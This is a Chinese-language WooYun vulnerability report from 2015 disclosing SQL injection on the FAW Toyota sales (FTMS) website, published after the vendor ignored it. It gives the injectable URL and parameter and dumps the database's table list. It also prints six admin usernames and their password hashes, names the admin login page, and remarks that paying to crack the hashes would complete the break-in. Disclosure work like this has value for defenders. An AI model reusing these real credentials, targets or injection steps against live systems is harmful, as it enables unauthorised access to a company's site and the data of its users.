当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128623

漏洞标题:一汽丰田汽车销售有限公司(FTMS)SQL注射一枚

相关厂商:一汽丰田汽车销售有限公司

漏洞作者: 冷白开。

提交时间:2015-07-23 13:33

修复时间:2015-09-06 13:34

公开时间:2015-09-06 13:34

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

一汽丰田汽车销售有限公司(FTMS)SQL注射一枚

详细说明:

注射点http://www.ftms.com.cn/information/news_detail.php?id=82

QQ群1111111.png

dealer库里表段太多截图不下,直接贴在code里吧

Database: dealer
[87 tables]
+----------------------+
| actions              |
| adminmanage          |
| carfield             |
| carinfo              |
| cars                 |
| cartype              |
| color_cars           |
| colors               |
| members              |
| news                 |
| news_cartype         |
| newstype             |
| recom                |
| setting              |
| siteinfo             |
| t_ad                 |
| t_ad1111             |
| t_admin              |
| t_article            |
| t_article11111       |
| t_car                |
| t_cars               |
| t_cars1111           |
| t_cou_50_ip_hits     |
| t_cou_50_ip_limit    |
| t_cou_adv            |
| t_cou_alexa          |
| t_cou_area           |
| t_cou_bot            |
| t_cou_browser        |
| t_cou_city           |
| t_cou_color          |
| t_cou_country        |
| t_cou_day_data       |
| t_cou_holiday        |
| t_cou_keyword        |
| t_cou_language       |
| t_cou_month_data     |
| t_cou_page           |
| t_cou_pagead         |
| t_cou_pagedepth      |
| t_cou_pageentry      |
| t_cou_plug           |
| t_cou_province       |
| t_cou_referer        |
| t_cou_returner       |
| t_cou_screen         |
| t_cou_similar        |
| t_cou_site           |
| t_cou_system         |
| t_cou_timelong       |
| t_cou_timezone       |
| t_cou_user_site      |
| t_cou_users          |
| t_cou_year_data      |
| t_dealer             |
| t_dealer1111         |
| t_dealer1112         |
| t_dealer_1108        |
| t_dealer_1109        |
| t_dealer_1115        |
| t_dealer_1116        |
| t_dealer_bak20120914 |
| t_gbook              |
| t_job                |
| t_link               |
| t_new_cars           |
| t_new_class          |
| t_new_event          |
| t_new_focus          |
| t_new_items          |
| t_new_message        |
| t_new_news           |
| t_new_newsclass      |
| t_new_reserve        |
| t_new_testdrive      |
| t_notice             |
| t_photo              |
| t_photo1111          |
| t_province_city      |
| t_refinement         |
| t_sessions           |
| t_sort               |
| t_sort_bak           |
| t_sort_rename        |
| t_user               |
| t_way                |
+----------------------+

这里我们选择t_admin这个表来run

333333.png

下面是管理用户名

123123123123.png

Database: dealer
Table: t_admin
[6 entries]
+----------+
| username |
+----------+
| geniusyt |
| r        |
| ring     |
| sring    |
| ssff     |
| toyota   |
+----------+

加密后的密码,屌丝还是那个问题,木钱解付费的。。。只能到此为止,但是有小富婆来渗透的话,这临门一脚就踹进去了

44444.png

特此贴出让我无语的加密密码

Database: dealer
Table: t_admin
[6 entries]
+----------------------------------+
| psw                              |
+----------------------------------+
| 0c805f9b3a3a55c637612616e22e41c1 |
| 0f890f48e3922999c7b364eef3df6615 |
| 132cd3b981019b59dc42653eea0b34b4 |
| 484965bbd038138b30664359f1163f04 |
| 6e14a1b7b419878ef8a308f30dbbe1bf |
| b229fbfe4c64d1d070511e1150d5e62e |
+----------------------------------+


后台登录地址http://www.ftms.com.cn/admin/login.php

漏洞证明:

综上

修复方案:

你们懂

版权声明:转载请注明来源 冷白开。@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)